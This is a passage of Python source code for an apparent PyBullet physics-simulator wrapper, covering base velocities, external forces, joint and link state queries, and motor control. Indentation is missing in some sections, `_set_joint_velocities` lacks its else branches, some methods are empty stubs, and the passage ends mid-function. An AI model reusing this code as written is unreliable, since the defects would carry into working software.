self.reset_base_pose(body_id, position, orientation)
def reset_base_orientation(self, body_id, orientation):
"""
Reset the base orientation of the specified body/object id while preserving its position.
Args:
body_id (int): unique object id.
orientation (np.array[float[4]]): new base orientation (expressed as a quaternion [x,y,z,w])
"""
position = self.get_base_position(body_id)
self.reset_base_pose(body_id, position, orientation)
def get_base_velocity(self, body_id):
"""
Return the base linear and angular velocities.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: linear velocity of the base in Cartesian world space coordinates
np.array[float[3]]: angular velocity of the base in Cartesian world space coordinates
"""
lin_vel, ang_vel = self.sim.getBaseVelocity(body_id)
return np.asarray(lin_vel), np.asarray(ang_vel)
def get_base_linear_velocity(self, body_id):
"""
Return the linear velocity of the base.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: linear velocity of the base in Cartesian world space coordinates
"""
return self.get_base_velocity(body_id)[0]
def get_base_angular_velocity(self, body_id):
"""
Return the angular velocity of the base.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: angular velocity of the base in Cartesian world space coordinates
"""
return self.get_base_velocity(body_id)[1]
def reset_base_velocity(self, body_id, linear_velocity=None, angular_velocity=None):
"""
Reset the base velocity.
Args:
body_id (int): unique object id.
linear_velocity (np.array[float[3]]): new linear velocity of the base.
angular_velocity (np.array[float[3]]): new angular velocity of the base.
"""
if linear_velocity is not None and angular_velocity is not None:
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity, angularVelocity=angular_velocity)
elif linear_velocity is not None:
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity)
elif angular_velocity is not None:
self.sim.resetBaseVelocity(body_id, angularVelocity=angular_velocity)
def reset_base_linear_velocity(self, body_id, linear_velocity):
"""
Reset the base linear velocity.
Args:
body_id (int): unique object id.
linear_velocity (np.array[float[3]]): new linear velocity of the base
"""
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity)
def reset_base_angular_velocity(self, body_id, angular_velocity):
"""
Reset the base angular velocity.
Args:
body_id (int): unique object id.
angular_velocity (np.array[float[3]]): new angular velocity of the base
"""
self.sim.resetBaseVelocity(body_id, angularVelocity=angular_velocity)
def apply_external_force(self, body_id, link_id=-1, force=(0., 0., 0.), position=None, frame=Simulator.LINK_FRAME):
"""
Apply the specified external force on the specified position on the body / link.
"This method will only work when explicitly stepping the simulation using stepSimulation, in other words:
setRealTimeSimulation(0). After each simulation step, the external forces are cleared to zero. If you are
using 'setRealTimeSimulation(1), apply_external_force/Torque will have undefined behavior (either 0, 1 or
multiple force/torque applications)" [1]
Args:
body_id (int): unique body id.
link_id (int): unique link id. If -1, it will be the base.
force (np.array[float[3]]): external force to be applied.
position (np.array[float[3]], None): position on the link where the force is applied. See `flags` for
coordinate systems. If None, it is the center of mass of the body (or the link if specified).
frame (int): Specify the coordinate system of force/position: either `pybullet.WORLD_FRAME` (=2) for
Cartesian world coordinates or `pybullet.LINK_FRAME` (=1) for local link coordinates.
"""
if position is None:
if frame == Simulator.WORLD_FRAME: # world frame
if link_id == -1:
position = self.get_base_pose(body_id)[0]
else:
position = self.get_link_state(body_id, link_id)[0]
else: # local frame
position = (0., 0., 0.)
self.sim.applyExternalForce(objectUniqueId=body_id, linkIndex=link_id, forceObj=force, posObj=position,
flags=frame)
def apply_external_torque(self, body_id, link_id=-1, torque=(0., 0., 0.), frame=Simulator.LINK_FRAME):
"""
Apply an external torque on a body, or a link of the body. Note that after each simulation step, the external
torques are cleared to 0.
Warnings: This does not work when using `sim.setRealTimeSimulation(1)`.
Args:
body_id (int): unique body id.
link_id (int): link id to apply the torque, if -1 it will apply the torque on the base
torque (float[3]): Cartesian torques to be applied on the body
frame (int): Specify the coordinate system of force/position: either `pybullet.WORLD_FRAME` (=2) for
Cartesian world coordinates or `pybullet.LINK_FRAME` (=1) for local link coordinates.
"""
self.sim.applyExternalTorque(objectUniqueId=body_id, linkIndex=link_id, torqueObj=torque, flags=frame)
###################
# transformations #
###################
#############################
# robots (joints and links) #
#############################
def num_joints(self, body_id):
"""
Return the total number of joints of the specified body. This is the same as calling `num_links`.
Args:
body_id (int): unique body id.
Returns:
int: number of joints with the associated body id.
"""
return self.sim.getNumJoints(body_id)
def num_actuated_joints(self, body_id):
"""
Return the total number of actuated joints associated with the given body id.
Warnings: this checks through the list of all joints each time it is called. It might be a good idea to call
this method one time and cache the actuated joint ids.
Args:
body_id (int): unique body id.
Returns:
int: number of actuated joints of the specified body.
"""
return len(self.get_actuated_joint_ids(body_id))
def num_links(self, body_id):
"""
Return the total number of links of the specified body. This is the same as calling `num_joints`.
Args:
body_id (int): unique body id.
Returns:
int: number of links with the associated body id.
"""
return self.num_joints(body_id)
def get_joint_info(self, body_id, joint_id):
"""
Return information about the given joint about the specified body.
Note that this method returns a lot of information, so specific methods have been implemented that return
only the desired information. Also, note that we do not convert the data here.
Args:
body_id (int): unique body id.
joint_id (int): joint id is included in [0..`num_joints(body_id)`].
Returns:
[0] int: the same joint id as the input parameter
[1] str: name of the joint (as specified in the URDF/SDF/etc file)
[2] int: type of the joint which implie the number of position and velocity variables.
The types include JOINT_REVOLUTE (=0), JOINT_PRISMATIC (=1), JOINT_SPHERICAL (=2),
JOINT_PLANAR (=3), and JOINT_FIXED (=4).
[3] int: q index - the first position index in the positional state variables for this body
[4] int: dq index - the first velocity index in the velocity state variables for this body
[5] int: flags (reserved)
[6] float: the joint damping value (as specified in the URDF file)
[7] float: the joint friction value (as specified in the URDF file)
[8] float: the positional lower limit for slider and revolute joints
[9] float: the positional upper limit for slider and revolute joints
[10] float: maximum force specified in URDF. Note that this value is not automatically used.
You can use maxForce in 'setJointMotorControl2'.
[11] float: maximum velocity specified in URDF. Note that this value is not used in actual
motor control commands at the moment.
[12] str: name of the link (as specified in the URDF/SDF/etc file)
[13] np.array[float[3]]: joint axis in local frame (ignored for JOINT_FIXED)
[14] np.array[float[3]]: joint position in parent frame
[15] np.array[float[4]]: joint orientation in parent frame
[16] int: parent link index, -1 for base
"""
info = list(self.sim.getJointInfo(body_id, joint_id))
info[1] = info[1] if isinstance(info[1], str) else info[1].decode("utf-8") # bytes vs str (Py2 vs Py3)
info[12] = info[12] if isinstance(info[12], str) else info[12].decode("utf-8")
info[13] = np.asarray(info[13])
info[14] = np.asarray(info[14])
info[15] = np.asarray(info[15])
return info
def get_joint_state(self, body_id, joint_id):
"""
Get the joint state.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_id (int): joint index in range [0..num_joints(body_id)]
Returns:
float: The position value of this joint.
float: The velocity value of this joint.
np.array[float[6]]: These are the joint reaction forces, if a torque sensor is enabled for this joint it is
[Fx, Fy, Fz, Mx, My, Mz]. Without torque sensor, it is [0, 0, 0, 0, 0, 0].
float: This is the motor torque applied during the last stepSimulation. Note that this only applies in
VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the applied joint motor torque
is exactly what you provide, so there is no need to report it separately.
"""
pos, vel, forces, torque = self.sim.getJointState(body_id, joint_id)
return pos, vel, np.asarray(forces), torque
def get_joint_states(self, body_id, joint_ids):
"""
Get the joint state of the specified joints.
Args:
body_id (int): body unique id.
joint_ids (list[int]): list of joint ids.
Returns:
list:
float: The position value of this joint.
float: The velocity value of this joint.
np.array[float[6]]: These are the joint reaction forces, if a torque sensor is enabled for this joint
it is [Fx, Fy, Fz, Mx, My, Mz]. Without torque sensor, it is [0, 0, 0, 0, 0, 0].
float: This is the motor torque applied during the last `step`. Note that this only applies in
VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the applied joint motor
torque is exactly what you provide, so there is no need to report it separately.
"""
states = list(self.sim.getJointStates(body_id, joint_ids))
for idx, state in enumerate(states):
states[idx] = list(state)
states[idx][2] = np.asarray(state[2])
return states
def reset_joint_state(self, body_id, joint_id, position, velocity=None):
"""
Reset the state of the joint. It is best only to do this at the start, while not running the simulation:
`reset_joint_state` overrides all physics simulation. Note that we only support 1-DOF motorized joints at
the moment, sliding joint or revolute joints.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_id (int): joint index in range [0..num_joints(body_id)]
position (float): the joint position (angle in radians [rad] or position [m])
velocity (float): the joint velocity (angular [rad/s] or linear velocity [m/s])
"""
if velocity is None:
self.sim.resetJointState(body_id, joint_id, position)
else:
self.sim.resetJointState(body_id, joint_id, position, velocity)
def enable_joint_force_torque_sensor(self, body_id, joint_ids, enable=True):
"""
You can enable or disable a joint force/torque sensor in each joint. Once enabled, if you perform a
`step`, the 'get_joint_state' will report the joint reaction forces in the fixed degrees of freedom: a fixed
joint will measure all 6DOF joint forces/torques. A revolute/hinge joint force/torque sensor will measure
5DOF reaction forces along all axis except the hinge axis. The applied force by a joint motor is available
in the `applied_joint_motor_torque` of `get_joint_state`.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_ids (int, int[N]): joint index in range [0..num_joints(body_id)], or list of joint ids.
enable (bool): True to enable, False to disable the force/torque sensor
"""
if isinstance(joint_ids, int):
self.sim.enableJointForceTorqueSensor(body_id, joint_ids, int(enable))
else:
for joint_id in joint_ids:
self.sim.enableJointForceTorqueSensor(body_id, joint_id, int(enable))
def set_joint_motor_control(self, body_id, joint_ids, control_mode=Simulator.POSITION_CONTROL, positions=None,
velocities=None, forces=None, kp=None, kd=None, max_velocity=None):
r"""
Set the joint motor control.
In position control:
.. math:: error = Kp (x_{des} - x) + Kd (\dot{x}_{des} - \dot{x})
In velocity control:
.. math:: error = \dot{x}_{des} - \dot{x}
Note that the maximum forces and velocities are not automatically used for the different control schemes.
"We can control a robot by setting a desired control mode for one or more joint motors. During the `step`,
the physics engine will simulate the motors to reach the given target value that can be reached within
the maximum motor forces and other constraints. Each revolute joint and prismatic joint is motorized
by default. There are 3 different motor control modes: position control, velocity control and torque control.
You can effectively disable the motor by using a force of 0. You need to disable motor in order to use direct
torque control: `set_joint_motor_control(body_id, joint_id, control_mode=pybullet.VELOCITY_CONTROL,
force=force)`"
Args:
body_id (int): body unique id.
joint_ids ((list of) int): joint/link id, or list of joint ids.
control_mode (int): POSITION_CONTROL (=2) (which is in fact CONTROL_MODE_POSITION_VELOCITY_PD),
VELOCITY_CONTROL (=0), TORQUE_CONTROL (=1) and PD_CONTROL (=3).
positions (float, np.array[float[N]]): target joint position(s) (used in POSITION_CONTROL).
velocities (float, np.array[float[N]]): target joint velocity(ies). In VELOCITY_CONTROL and
POSITION_CONTROL, the target velocity(ies) is(are) the desired velocity of the joint. Note that the
target velocity(ies) is(are) not the maximum joint velocity(ies). In PD_CONTROL and
POSITION_CONTROL/CONTROL_MODE_POSITION_VELOCITY_PD, the final target velocities are computed using:
`kp*(erp*(desiredPosition-currentPosition)/dt)+currentVelocity+kd*(m_desiredVelocity - currentVelocity)`
forces (float, list[float]): in POSITION_CONTROL and VELOCITY_CONTROL, these are the maximum motor
forces used to reach the target values. In TORQUE_CONTROL these are the forces / torques to be applied
each simulation step.
kp (float, list[float]): position (stiffness) gain(s) (used in POSITION_CONTROL).
kd (float, list[float]): velocity (damping) gain(s) (used in POSITION_CONTROL).
max_velocity (float): in POSITION_CONTROL this limits the velocity to a maximum.
"""
kwargs = {}
if isinstance(joint_ids, int):
if positions is not None:
kwargs['targetPosition'] = positions
if velocities is not None:
kwargs['targetVelocity'] = velocities
if forces is not None:
kwargs['force'] = forces
if kp is not None:
kwargs['positionGain'] = kp
if kd is not None:
kwargs['velocityGain'] = kd
if max_velocity is not None:
kwargs['maxVelocity'] = max_velocity
self.sim.setJointMotorControl2(body_id, joint_ids, controlMode=control_mode, **kwargs)
else: # joint_ids is a list
if positions is not None:
kwargs['targetPositions'] = positions
if velocities is not None:
kwargs['targetVelocities'] = velocities
if forces is not None:
if isinstance(forces, (int, float)):
forces = [forces] * len(joint_ids)
kwargs['forces'] = forces
if kp is not None:
if isinstance(kp, (int, float)):
kp = [kp] * len(joint_ids)
kwargs['positionGains'] = kp
if kd is not None:
if isinstance(kd, (int, float)):
kd = [kd] * len(joint_ids)
kwargs['velocityGains'] = kd
self.sim.setJointMotorControlArray(body_id, joint_ids, controlMode=control_mode, **kwargs)
def get_link_state(self, body_id, link_id, compute_velocity=False, compute_forward_kinematics=False):
    """
    Return the state of the specified link, each entry converted to a numpy array.

    Args:
        body_id (int): body unique id.
        link_id (int): link index.
        compute_velocity (bool): if True, the Cartesian world velocity is also computed and returned.
        compute_forward_kinematics (bool): if True, the Cartesian world position/orientation is recomputed
            using forward kinematics.

    Returns:
        list[np.array]: in order: CoM world position (3,), CoM world orientation quaternion [x,y,z,w] (4,),
            local inertial-frame position offset (3,), local inertial-frame orientation offset (4,),
            URDF link-frame world position (3,), URDF link-frame world orientation (4,), and - only when
            `compute_velocity` is True - world linear velocity (3,) and world angular velocity (3,).
    """
    state = self.sim.getLinkState(body_id, link_id, computeLinkVelocity=int(compute_velocity),
                                  computeForwardKinematics=int(compute_forward_kinematics))
    return [np.asarray(entry) for entry in state]
def get_link_states(self, body_id, link_ids, compute_velocity=False, compute_forward_kinematics=False):
    """
    Return the state of each of the given links.

    Args:
        body_id (int): body unique id.
        link_ids (list[int]): list of link indices.
        compute_velocity (bool): if True, the Cartesian world velocity is also computed and returned.
        compute_forward_kinematics (bool): if True, the Cartesian world position/orientation is recomputed
            using forward kinematics.

    Returns:
        list: one entry per link; each entry is the list returned by `get_link_state` (CoM world
            position/orientation, local inertial-frame offsets, URDF link-frame world pose, and - when
            `compute_velocity` is True - world linear and angular velocities).
    """
    states = []
    for link in link_ids:
        states.append(self.get_link_state(body_id, link, compute_velocity, compute_forward_kinematics))
    return states
def get_link_names(self, body_id, link_ids):
    """
    Return the name of the given link(s). The base link (-1) resolves to the body's base name.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link id, or list of link ids.

    Returns:
        str: link name, if a single link id was given.
        list[str]: one name per link, if a list was given.
    """
    def name_of(link):
        # base link has no joint info entry; ask the body for its base name instead
        if link == -1:
            return self.get_base_name(body_id)
        raw = self.sim.getJointInfo(body_id, link)[12]
        # pybullet may hand back bytes; normalize to str
        return raw if isinstance(raw, str) else raw.decode("utf-8")

    if isinstance(link_ids, int):
        return name_of(link_ids)
    return [name_of(link) for link in link_ids]
def get_link_masses(self, body_id, link_ids):
    """
    Return the mass of the given link(s).

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link id, or list of link ids.

    Returns:
        float: mass of the link, if a single link id was given.
        np.array[float[N]]: mass of each link, if a list was given.
    """
    dynamics_info = self.sim.getDynamicsInfo
    if isinstance(link_ids, int):
        return dynamics_info(body_id, link_ids)[0]
    masses = []
    for link in link_ids:
        masses.append(dynamics_info(body_id, link)[0])
    return np.asarray(masses)
def get_link_frames(self, body_id, link_ids):
    r"""
    Return the URDF link frame world position(s) and orientation(s).

    Args:
        body_id (int): body id.
        link_ids (int, int[N]): link id, or list of desired link ids (-1 selects the base pose).

    Returns:
        if 1 link:
            np.array[float[3]]: link frame position in world space
            np.array[float[4]]: link frame orientation quaternion [x,y,z,w]
        if multiple links:
            np.array[float[N,3]]: link frame position of each link in world space
            np.array[float[N,4]]: orientation of each link frame [x,y,z,w]
    """
    def frame_of(link):
        if link == -1:  # base link: its frame is the body's base pose
            return self.get_base_pose(body_id=body_id)
        return self.get_link_state(body_id=body_id, link_id=link)[4:6]

    if isinstance(link_ids, int):
        return frame_of(link_ids)
    frames = [frame_of(link) for link in link_ids]
    return np.asarray([f[0] for f in frames]), np.asarray([f[1] for f in frames])
def get_link_world_positions(self, body_id, link_ids):
    """
    Return the CoM position (in the Cartesian world frame) of the given link(s).

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link index, or list of link indices (-1 selects the base).

    Returns:
        np.array[float[3]]: link CoM world position, if a single link id was given.
        np.array[float[N,3]]: CoM world position of each link, if a list was given.
    """
    def world_position(link):
        if link == -1:
            return self.get_base_position(body_id)
        return np.asarray(self.sim.getLinkState(body_id, link)[0])

    if isinstance(link_ids, int):
        return world_position(link_ids)
    return np.asarray([world_position(link) for link in link_ids])
def get_link_positions(self, body_id, link_ids):
    """
    Get the position of the given link(s) expressed in their parent frame.

    NOTE(review): not implemented in this backend - the method is currently a no-op returning None.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link id, or list of link ids.
    """
    pass
def get_link_world_orientations(self, body_id, link_ids):
    """
    Return the CoM orientation (in the Cartesian world frame) of the given link(s).

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link index, or list of link indices (-1 selects the base).

    Returns:
        np.array[float[4]]: link CoM orientation quaternion (x,y,z,w), if a single link id was given.
        np.array[float[N,4]]: CoM orientation of each link (x,y,z,w), if a list was given.
    """
    def world_orientation(link):
        if link == -1:
            return self.get_base_orientation(body_id)
        return np.asarray(self.sim.getLinkState(body_id, link)[1])

    if isinstance(link_ids, int):
        return world_orientation(link_ids)
    return np.asarray([world_orientation(link) for link in link_ids])
def get_link_orientations(self, body_id, link_ids):
    """
    Get the orientation of the given link(s) expressed in their parent frame.

    NOTE(review): not implemented in this backend - the method is currently a no-op returning None.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link id, or list of link ids.
    """
    pass
def get_link_world_linear_velocities(self, body_id, link_ids):
    """
    Return the linear velocity of the link(s) expressed in the Cartesian world frame.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link index, or list of link indices (-1 selects the base).

    Returns:
        np.array[float[3]]: linear world velocity of the link, if a single link id was given.
        np.array[float[N,3]]: linear world velocity of each link, if a list was given.
    """
    def linear_velocity(link):
        if link == -1:
            return self.get_base_linear_velocity(body_id)
        return np.asarray(self.sim.getLinkState(body_id, link, computeLinkVelocity=1)[6])

    if isinstance(link_ids, int):
        return linear_velocity(link_ids)
    return np.asarray([linear_velocity(link) for link in link_ids])
def get_link_world_angular_velocities(self, body_id, link_ids):
    """
    Return the angular velocity of the link(s) in the Cartesian world space coordinates.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link index, or list of link indices (-1 selects the base).

    Returns:
        if 1 link:
            np.array[float[3]]: angular velocity of the link in the Cartesian world space
        if multiple links:
            np.array[float[N,3]]: angular velocity of each link
    """
    if isinstance(link_ids, int):
        if link_ids == -1:
            # bug fix: previously returned the base *linear* velocity (copy-paste from the
            # linear-velocity method); this method must report the angular velocity.
            return self.get_base_angular_velocity(body_id)
        return np.asarray(self.sim.getLinkState(body_id, link_ids, computeLinkVelocity=1)[7])
    velocities = []
    for link_id in link_ids:
        if link_id == -1:
            # bug fix: same linear/angular copy-paste defect as the single-link branch above
            velocities.append(self.get_base_angular_velocity(body_id))
        else:
            velocities.append(np.asarray(self.sim.getLinkState(body_id, link_id, computeLinkVelocity=1)[7]))
    return np.asarray(velocities)
def get_link_world_velocities(self, body_id, link_ids):
    """
    Return the stacked linear and angular world velocities of the given link(s).

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link index, or list of link indices (-1 selects the base).

    Returns:
        np.array[float[6]]: [linear(3), angular(3)] world velocity, if a single link id was given.
        np.array[float[N,6]]: stacked velocities of each link, if a list was given.
    """
    if isinstance(link_ids, int):
        if link_ids == -1:
            linear, angular = self.get_base_velocity(body_id)
            return np.concatenate((linear, angular))
        linear, angular = self.sim.getLinkState(body_id, link_ids, computeLinkVelocity=1)[6:8]
        return np.asarray(linear + angular)
    stacked = []
    for link in link_ids:
        if link == -1:  # base link
            linear, angular = self.get_base_velocity(body_id)
        else:
            linear, angular = self.sim.getLinkState(body_id, link, computeLinkVelocity=1)[6:8]
        stacked.append(np.concatenate((linear, angular)))
    return np.asarray(stacked)
def get_link_velocities(self, body_id, link_ids):
    """
    Get the velocity of the given link(s) expressed in their parent frame.

    NOTE(review): not implemented in this backend - the method is currently a no-op returning None.

    Args:
        body_id (int): unique body id.
        link_ids (int, list[int]): link id, or list of link ids.
    """
    pass
def get_q_indices(self, body_id, joint_ids):
    """
    Get the q index of the given joint(s).

    The q index maps a joint into the generalized-coordinate vector; the offset of 7 accounts for
    the floating-base pose (3 position + 4 quaternion) that precedes the joint coordinates.

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        int: q index, if a single joint id was given.
        np.array[int[N]]: q indices, if a list was given.
    """
    if isinstance(joint_ids, int):
        return self.sim.getJointInfo(body_id, joint_ids)[3] - 7
    indices = [self.sim.getJointInfo(body_id, joint)[3] - 7 for joint in joint_ids]
    return np.asarray(indices)
def get_actuated_joint_ids(self, body_id):
    """
    Get the actuated (i.e. non-fixed) joint ids associated with the given body id.

    Warnings: this scans every joint on each call; consider calling it once and caching the result.

    Args:
        body_id (int): unique body id.

    Returns:
        list[int]: actuated joint ids.
    """
    actuated = []
    for joint_id in range(self.num_joints(body_id)):
        info = self.get_joint_info(body_id, joint_id)
        if info[2] == self.sim.JOINT_FIXED:  # skip fixed joints; they carry no DoF
            continue
        actuated.append(info[0])
    return actuated
def get_joint_names(self, body_id, joint_ids):
    """
    Return the name of the given joint(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        str: joint name, if a single joint id was given.
        list[str]: one name per joint, if a list was given.
    """
    def decode(raw):
        # pybullet may hand back bytes; normalize to str
        return raw if isinstance(raw, str) else raw.decode("utf-8")

    if isinstance(joint_ids, int):
        return decode(self.sim.getJointInfo(body_id, joint_ids)[1])
    return [decode(self.sim.getJointInfo(body_id, joint)[1]) for joint in joint_ids]
def get_joint_type_ids(self, body_id, joint_ids):
    """
    Get the joint type id(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        int: joint type id, if a single joint id was given.
        list[int]: one type id per joint, if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return info(body_id, joint_ids)[2]
    type_ids = []
    for joint in joint_ids:
        type_ids.append(info(body_id, joint)[2])
    return type_ids
def get_joint_type_names(self, body_id, joint_ids):
    """
    Get human-readable joint type name(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        str: joint type name, if a single joint id was given.
        list[str]: one type name per joint, if a list was given.
    """
    # index in this tuple == pybullet joint type id
    names = ('revolute', 'prismatic', 'spherical', 'planar', 'fixed', 'point2point', 'gear')
    if isinstance(joint_ids, int):
        return names[self.sim.getJointInfo(body_id, joint_ids)[2]]
    return [names[self.sim.getJointInfo(body_id, joint)[2]] for joint in joint_ids]
def get_joint_dampings(self, body_id, joint_ids):
    """
    Get the damping coefficient of the given joint(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        float: damping coefficient, if a single joint id was given.
        np.array[float[N]]: damping coefficient of each joint, if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return info(body_id, joint_ids)[6]
    dampings = []
    for joint in joint_ids:
        dampings.append(info(body_id, joint)[6])
    return np.asarray(dampings)
def get_joint_frictions(self, body_id, joint_ids):
    """
    Get the friction coefficient of the given joint(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        float: friction coefficient, if a single joint id was given.
        np.array[float[N]]: friction coefficient of each joint, if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return info(body_id, joint_ids)[7]
    frictions = []
    for joint in joint_ids:
        frictions.append(info(body_id, joint)[7])
    return np.asarray(frictions)
def get_joint_limits(self, body_id, joint_ids):
    """
    Get the lower and upper position limits of the given joint(s).

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        np.array[float[2]]: [lower, upper] limit, if a single joint id was given.
        np.array[float[N,2]]: [lower, upper] limit of each joint, if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return np.asarray(info(body_id, joint_ids)[8:10])
    limits = []
    for joint in joint_ids:
        limits.append(info(body_id, joint)[8:10])
    return np.asarray(limits)
def get_joint_max_forces(self, body_id, joint_ids):
    """
    Get the maximum force that can be applied on the given joint(s).

    Warning: this value is informational; it is not automatically enforced in position, velocity,
    or torque control.

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        float: maximum force [N], if a single joint id was given.
        np.array[float[N]]: maximum force of each joint [N], if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return info(body_id, joint_ids)[10]
    forces = []
    for joint in joint_ids:
        forces.append(info(body_id, joint)[10])
    return np.asarray(forces)
def get_joint_max_velocities(self, body_id, joint_ids):
    """
    Get the maximum velocity that can be applied on the given joint(s).

    Warning: this value is informational; it is not automatically enforced in position, velocity,
    or torque control.

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        float: maximum velocity [rad/s], if a single joint id was given.
        np.array[float[N]]: maximum velocity of each joint [rad/s], if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return info(body_id, joint_ids)[11]
    velocities = []
    for joint in joint_ids:
        velocities.append(info(body_id, joint)[11])
    return np.asarray(velocities)
def get_joint_axes(self, body_id, joint_ids):
    """
    Get the joint axis of the given joint(s), expressed in the local joint frame.

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): a joint id, or list of joint ids.

    Returns:
        np.array[float[3]]: joint axis, if a single joint id was given.
        np.array[float[N,3]]: joint axis of each joint, if a list was given.
    """
    info = self.sim.getJointInfo
    if isinstance(joint_ids, int):
        return np.asarray(info(body_id, joint_ids)[-4])
    axes = []
    for joint in joint_ids:
        axes.append(info(body_id, joint)[-4])
    return np.asarray(axes)
def _set_joint_positions(self, body_id, joint_ids, positions, velocities=None, kps=None, kds=None, forces=None):
"""
Set the position of the given joint(s) (using position control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
positions (float, np.array[float[N]]): desired position, or list of desired positions [rad]
velocities (None, float, np.array[float[N]]): desired velocity, or list of desired velocities [rad/s]
kps (None, float, np.array[float[N]]): position gain(s)
kds (None, float, np.array[float[N]]): velocity gain(s)
forces (None, float, np.array[float[N]]): maximum motor force(s)/torque(s) used to reach the target values.
"""
self.set_joint_motor_control(body_id, joint_ids, control_mode=pybullet.POSITION_CONTROL, positions=positions,
velocities=velocities, forces=forces, kp=kps, kd=kds)
def _get_joint_positions(self, body_id, joint_ids):
"""
Get the position of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
Returns:
if 1 joint:
float: joint position [rad]
if multiple joints:
np.array[float[N]]: joint positions [rad]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[0]
return np.asarray([state[0] for state in self.sim.getJointStates(body_id, joint_ids)])
def _set_joint_velocities(self, body_id, joint_ids, velocities, max_force=None):
"""
Set the velocity of the given joint(s) (using velocity control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
velocities (float, np.array[float[N]]): desired velocity, or list of desired velocities [rad/s]
max_force (None, float, np.array[float[N]]): maximum motor forces/torques
"""
if isinstance(joint_ids, int):
if max_force is None:
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.VELOCITY_CONTROL, targetVelocity=velocities)
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.VELOCITY_CONTROL, targetVelocity=velocities,
force=max_force)
if max_force is None:
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.VELOCITY_CONTROL,
targetVelocities=velocities)
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.VELOCITY_CONTROL,
targetVelocities=velocities, forces=max_force)
def _get_joint_velocities(self, body_id, joint_ids):
"""
Get the velocity of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
Returns:
if 1 joint:
float: joint velocity [rad/s]
if multiple joints:
np.array[float[N]]: joint velocities [rad/s]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[1]
return np.asarray([state[1] for state in self.sim.getJointStates(body_id, joint_ids)])
def set_joint_accelerations(self, body_id, joint_ids, accelerations, q=None, dq=None):
    """
    Set the acceleration of the given joint(s) (using force control). This is achieved by performing
    inverse dynamics which, given the joint accelerations, computes the joint torques to be applied.

    Args:
        body_id (int): unique body id.
        joint_ids (int, list[int]): joint id, or list of joint ids.
        accelerations (float, np.array[float[N]]): desired joint acceleration, or list of desired joint
            accelerations [rad/s^2]
        q (None, list[float], float): current joint positions. If None, they are queried from the simulator.
        dq (None, list[float], float): current joint velocities. If None, they are queried from the simulator.

    Raises:
        ValueError: if the number of accelerations does not match the number of joint ids.
    """
    # normalize scalar arguments to lists
    if isinstance(joint_ids, int):
        joint_ids = [joint_ids]
    if isinstance(accelerations, (int, float)):
        accelerations = [accelerations]
    if len(accelerations) != len(joint_ids):
        raise ValueError("Expecting the desired accelerations to be of the same size as the number of joints; "
                         "{} != {}".format(len(accelerations), len(joint_ids)))

    # get positions and velocities of all actuated joints if not provided
    if q is None or dq is None:
        joints = self.get_actuated_joint_ids(body_id)
        if q is None:
            q = self.get_joint_positions(body_id, joints)
        if dq is None:
            dq = self.get_joint_velocities(body_id, joints)

    num_actuated_joints = len(q)

    # if the acceleration vector does not cover every actuated joint, scatter the requested
    # accelerations into a full-size zero vector at the joints' q indices
    if len(accelerations) != num_actuated_joints:
        # bug fix: get_q_indices takes (body_id, joint_ids); body_id was missing here
        q_idx = self.get_q_indices(body_id, joint_ids)
        acc = np.zeros(num_actuated_joints)
        acc[q_idx] = accelerations
        accelerations = acc

    # compute joint torques from inverse dynamics
